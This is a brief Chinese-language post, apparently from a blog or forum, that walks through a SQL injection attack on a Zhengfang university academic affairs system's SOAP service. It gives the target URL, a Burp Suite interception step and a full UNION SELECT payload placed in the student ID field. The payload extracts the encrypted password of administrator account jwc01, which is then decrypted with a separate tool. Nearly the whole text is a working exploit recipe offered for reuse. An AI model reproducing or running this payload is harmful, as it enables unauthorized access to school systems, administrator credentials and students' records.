进入教务系统,将URL改为http://192.168.100.83/(t1dzmj4541lcbcn4lfncvzzt)/service.asmx
打开GetStuCheckinInfo
复制SOAP命令打burp suite的request处
在学号处进行payload测试
测试代码为222222’ union select Null,‘test’,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null from yhb where ‘a’='a
将test改为kl ‘a’='a改为yhm='jwc01,go
得出密文,最后利用正方解密软件解密
很久之前在百度找到的一篇文章,照着操作了一遍
如有侵权,提醒我删除
最后告解一下大家不要修改里面的信息哦
88